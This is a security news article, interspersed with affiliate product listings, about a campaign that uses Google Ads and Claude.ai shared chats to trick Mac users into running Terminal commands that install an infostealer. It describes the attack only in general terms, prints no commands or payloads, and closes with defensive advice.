TL;DR
Hackers are using Google Ads and legitimate Claude.ai shared chats to push malware onto Mac users. The campaign involves malicious instructions within shared chats hosted on Claude.ai, leading to silent malware downloads. Researchers have identified multiple variants, with ongoing efforts to analyze and counter these attacks.
Cybercriminals are actively exploiting Google Ads and legitimate Claude.ai shared chats to deliver malware to Mac users, according to recent security research. The campaign involves malicious instructions embedded within shared Claude chats that, when followed, silently download and execute malware on victims’ Macs. This development raises concerns about the misuse of AI platforms and ad networks for cyberattacks.
Security researcher Berk Albayrak from Trendyol Group first identified the campaign, which involves malicious Claude.ai shared chats that pose as official installation guides. These chats instruct users to open Terminal and execute commands that download encoded shell scripts, which then run in memory, making detection difficult. The scripts also perform victim profiling, collecting system information and exfiltrating data such as credentials and cookies, primarily targeting macOS users.
Two separate shared chats were found, hosted on different domains and infrastructure, but following similar social engineering approaches. The first, identified by Albayrak, appears to be a variant of the MacSync macOS infostealer, which harvests browser credentials and Keychain data. The second, observed by BleepingComputer, also delivers a payload through obfuscated scripts, with some variants skipping profiling steps and directly executing malicious payloads.
The campaign’s infrastructure relies on legitimate-looking Google Ads that point to the real claude.ai domain, but the malicious instructions are embedded within shared chats hosted on the platform. This abuse of AI-sharing features is not the first such incident; similar campaigns targeting ChatGPT and Grok have been documented previously. Researchers advise users to avoid following terminal commands from unverified sources and to download software directly from official sites.
Why It Matters
This campaign demonstrates how cybercriminals are leveraging trusted platforms and ad networks to distribute malware, increasing the risk for unsuspecting users. The use of AI chat features for malicious purposes highlights new attack vectors in the evolving cybersecurity landscape. For Mac users, the campaign underscores the importance of cautious behavior when following online instructions and the need for robust security measures.
Mac Mini Logic Board Removal Tool (2010-2018 Models)
High strength quality, metal construction
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Background
Malvertising campaigns have historically exploited search engines and ad networks to deliver malware, often involving fake or lookalike websites. This recent campaign is notable for abusing Claude.ai’s shared chat feature, which is designed for collaboration, to host malicious instructions. Previous incidents have targeted AI platforms like ChatGPT, but this is among the first known cases involving Claude.ai. The campaign’s use of polymorphic payloads and victim profiling techniques indicates a sophisticated operation aimed at selectively targeting users.
“The shared Claude chats are being weaponized to deliver malware through social engineering, with malicious instructions embedded in what appear to be legitimate guides.”
— Berk Albayrak, security engineer at Trendyol Group
“Researchers have identified multiple variants of the campaign, with some scripts skipping profiling and directly executing payloads, making detection more challenging.”
— BleepingComputer
McAfee Total Protection 5-Device | AntiVirus Software 2026 for Windows PC & Mac, AI Scam Detection, VPN, Password Manager, Identity Monitoring | 1-Year Subscription with Auto-Renewal | Download
DEVICE SECURITY – Award-winning McAfee antivirus, real-time threat protection, protects your data, phones, laptops, and tablets
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What Remains Unclear
It remains unclear how widespread the campaign is, whether additional variants exist, and if other AI platforms are being similarly exploited. The full scope of affected users and the extent of infrastructure used by attackers are still being investigated.
WD 2TB My Passport for Mac, Navy, Portable External Hard Drive with backup software and password protection, USB 3.1/USB 3.0 compatible – WDBA2D0020BBL-WESN
Designed for Mac.
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What’s Next
Security researchers and platform administrators are expected to continue analyzing the campaign, with potential updates on additional variants or infrastructure. Users are advised to avoid executing terminal commands from unverified sources and to rely on official app downloads. Further advisories may be issued to mitigate risk and improve detection capabilities.
Eyoyo Security Camera Monitor 22-inch, 1080P FHD 75Hz LED PC Screen with HDMI VGA AV BNC USB Inputs, Built- in Speakers, Video Monitor for CCTV NVR DVR
24/7 Surveillance: The 22 inch monitor features 1920×1080 Full HD, 100% sRGB color accuracy, and 300cd/㎡ brightness, making…
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Key Questions
How can I protect myself from this malware campaign?
Always download software from official sources, avoid executing commands from untrusted chats or links, and keep security software up to date. Be cautious of unsolicited instructions asking for terminal commands, even if they appear in trusted AI platforms.
Are Google Ads involved in this campaign?
Yes, attackers are abusing Google Ads to direct users to legitimate-looking Claude.ai shared chats containing malicious instructions.
What should I do if I encounter a malicious shared chat?
Report the chat to platform administrators, avoid following any embedded commands, and run security scans on your device. Do not execute commands or download files from suspicious sources.
Is this campaign affecting other platforms besides Claude.ai?
Currently, evidence suggests the campaign targets Claude.ai shared chats, but similar tactics have been used against other AI platforms like ChatGPT. Ongoing investigations will clarify the full scope.
